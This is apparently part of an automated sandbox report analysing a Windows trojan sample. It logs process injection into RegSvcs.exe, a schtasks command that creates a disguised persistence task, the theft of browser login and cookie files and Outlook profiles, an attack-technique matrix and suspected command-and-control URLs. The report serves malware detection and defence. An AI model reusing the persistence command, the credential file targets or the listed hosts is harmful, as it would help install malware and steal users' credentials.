            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe Thread register set: target process: 7228
            Source: C:\Windows\SysWOW64\sfc.exe Thread APC queued: target process: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DC3008
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 904008
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: TsdBVAGjsKVoi.exe, 00000010.00000002.3787501024.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000000.1569221895.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710445317.0000000000F81000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Queries volume information: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe VolumeInformation
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Users\user\AppData\Roaming\fuqwoDzun.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sfc.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph. ID: 1470000, Sample: Inquiry PR#27957.bat.exe, Startdate: 09/07/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            Inquiry PR#27957.bat.exe | 34% | ReversingLabs | Win32.Trojan.Generic |
            Inquiry PR#27957.bat.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\fuqwoDzun.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Roaming\fuqwoDzun.exe | 34% | ReversingLabs | Win32.Trojan.Generic |
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.viertage.work/br0f/0%Avira URL Cloudsafe
            http://www.ffi07s.xyz/y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.xn72dkd7scx.shop/emnz/0%Avira URL Cloudsafe
